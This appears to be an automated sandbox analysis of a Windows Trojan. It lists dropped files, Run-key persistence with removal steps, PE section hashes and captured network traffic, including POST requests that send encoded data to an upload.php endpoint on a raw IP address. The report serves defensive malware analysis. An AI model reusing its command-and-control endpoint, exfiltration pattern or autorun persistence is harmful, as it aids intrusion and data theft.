%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10088 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5468 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5993 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (2838 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3604 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (138779 bytes)
%WinDir%\comsetup.log (47798 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (245245 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (23303 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (20368 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (63539 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
%WinDir%\assembly\tmp\BTWZ369C\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
%WinDir%\assembly\tmp\H147ADGK\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
%WinDir%\assembly\tmp\5QTWZ369\Microsoft.WSMan.Management.resources.dll (13 bytes)
%WinDir%\assembly\tmp\DW0369CF\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
%WinDir%\assembly\tmp\GZ259CFI\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\9SWZ258B\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\GZ258BEI\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\9X259DGK\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
%WinDir%\assembly\tmp\RADGJNQT\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
%WinDir%\assembly\tmp\0JMPSVZ2\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\H0369CFI\System.Management.Automation.resources.dll (9320 bytes)
%WinDir%\assembly\tmp\BUX036AD\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
%WinDir%\assembly\tmp\CWZ369CF\Microsoft.WSMan.Runtime.dll (7 bytes)
%WinDir%\assembly\tmp\4PSVY158\Microsoft.PowerShell.Security.resources.dll (9 bytes)
%WinDir%\assembly\tmp\7QTWZ369\Microsoft.WSMan.Management.dll (9608 bytes)
%WinDir%\assembly\tmp\L58BEHKO\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
%WinDir%\assembly\tmp\7QUX0369\Microsoft.PowerShell.Security.dll (2392 bytes)
%WinDir%\assembly\tmp\P9DGJMPT\System.Management.Automation.dll (81046 bytes)
%WinDir%\assembly\tmp\CVY158BE\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
%WinDir%\assembly\tmp\EX147AEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
%WinDir%\assembly\tmp\SBFILORU\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
%WinDir%\assembly\tmp\P8CFILOR\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
%WinDir%\assembly\tmp\I148BEHK\Microsoft.PowerShell.Editor.dll (32824 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TV20EC7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\nabeq\nabeq.exe (250 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TV20EC7\uk-ua[1].htm (40545 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\JP5FTNMQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LT2VGPIN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BJN58IBF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TV20EC7\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\nabeq\nabeq.exe$"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\nabeq\nabeq.exe$" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 3502 | 3584 | 4.23042 | c58cd0ab817db8515973e7ff7ec4bc41 |
.rdata | 8192 | 1956 | 2048 | 3.41588 | e00f921dbd7eff6f18fc4694cf9a96e3 |
.data | 12288 | 3196 | 512 | 1.8601 | efa98342766a0be54b3fd62d70cc0370 |
.rsrc | 16384 | 243236 | 243712 | 5.53779 | 091f3fc2c766bab197f4d2451635683a |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://78.24.220.229/upload.php | |
hxxp://microsoft.com/ | 23.96.52.53 |
hxxp://e10088.dspb.akamaiedge.net/ | |
hxxp://e10088.dspb.akamaiedge.net/uk-ua/ | |
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | |
hxxp://www.microsoft.com/ | 23.60.20.155 |
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | 184.50.174.244 |
hxxp://www.microsoft.com/uk-ua/ | 23.60.20.155 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: hXXp://VVV.microsoft.com/uk-ua/
Date: Mon, 04 Jan 2016 21:57:34 GMT
Connection: keep-alive
X-CCC: SE
X-CID: 2
....
GET /uk-ua/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/8.0
CorrelationVector: o4xLECeJ10qB5szg.1.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Credentials: true
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Frame-Options: SAMEORIGIN
Content-Length: 82733
Date: Mon, 04 Jan 2016 21:57:35 GMT
Connection: keep-alive
Set-Cookie: MS-CV=o4xLECeJ10qB5szg.1; domain=.microsoft.com; expires=Tue, 05-Jan-2016 21:57:34 GMT; path=/
Set-Cookie: MS-CV=o4xLECeJ10qB5szg.2; domain=.microsoft.com; expires=Tue, 05-Jan-2016 21:57:34 GMT; path=/
X-CCC: SE
X-CID: 2
...<!DOCTYPE html ><html xmlns:mscom="hXXp://schemas.microsoft.com/CMSvNext" xmlns:md="hXXp://schemas.microsoft.com/mscom-data" lang="uk" xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="//VVV.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="hXXp://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js"> .. // Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - hXXp://VVV.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}")),document.getElementsByTagName("head")[0].appendChild(msViewportStyle)}/*]]>*/</script><script type="text/javascript" src="hXXp://ajax.aspnetcdn.com/ajax/jquery.mobile/1.3.2/jquery.mobile-1.3.2.min.js"></script><script type="text/javascript" src="hXXp://i.s-microsoft.com/library/svy/broker.js"></script><script type="text/javascript" src="hXXp://c.webt
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 04 Jan 2016 21:57:34 GMT
Content-Length: 148
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..Location: hXXp://VVV.microsoft.com/..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.NET..Date: Mon, 04 Jan 2016 21:57:34 GMT..Content-Length: 148..<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>..
GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache
Cookie: MS-CV=o4xLECeJ10qB5szg.2
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Mon, 04 Jan 2016 21:57:36 GMT
Connection: close
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ................................^.......... ......................................x.............]. ........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc...x........H].................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................l...V...:..."...............................|...................................(...r...d...T.......*...........P...j...................<...................\.......................................>...L...^...n...........................................2...L.......h...p.......................................(...>...L...`...v...................................N...>...,...................d...........................................................z...,...<...J...\...|.......N...Z...d...n...@....
<<< skipped >>>
POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 78.24.220.229
Content-Length: 244
Cache-Control: no-cache
cjgV3JM6WNOUhyrEExWQTHBiwqYMkiRoV2a4hJ i7eXpIxBiTyvkE7wuHdEEcguCadhVAhpu7ViVKtAKcaHlV3ueZ2GESy9yvECKRLUSYjlarRgSJIa47xt2eqZ8CxRJotCzzLZK56LYsaHmLQhC9Y1OudBP9DfklXK0rcmw0bhUD/u94o7fHT0QnSaxsjWSHRP0Alc5ar3g0SFqkmdxClLPRZXbkYZ53zy7ek4wFIqUI1jlLjE=
HTTP/1.1 404 Not Found
Date: Mon, 04 Jan 2016 21:57:34 GMT
Server: Apache/2.2.22 (@RELEASE@)
Content-Length: 290
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (@RELEASE@) Server at 78.24.220.229 Port 80</address>.</body></html>...
POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 78.24.220.229
Content-Length: 232
Cache-Control: no-cache
cDoQgJBtVPGjbvuJiEzDkqpt3qflFx8wpQXvxf4dUsBMQUuO1dnd7NUr aU3sNXRRLkqHrV291YOy5 MzI8r0hp9Xln/RmmKDATY21yV2zUT7NkOMAZKpEejydAgrPrbYzwEvS2rDHSbOTZ158qo sOrfvVaU SSC L9ovKdXejq35dVMdDEwA1JDD9DmsM0TZdEHHBKep2yR gDWVOdl8SLzk8QTGW/JGUn2Pj4
HTTP/1.1 404 Not Found
Date: Mon, 04 Jan 2016 21:57:34 GMT
Server: Apache/2.2.22 (@RELEASE@)
Content-Length: 290
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (@RELEASE@) Server at 78.24.220.229 Port 80</address>.</body></html>...
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
regsvr32.exe_1260:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
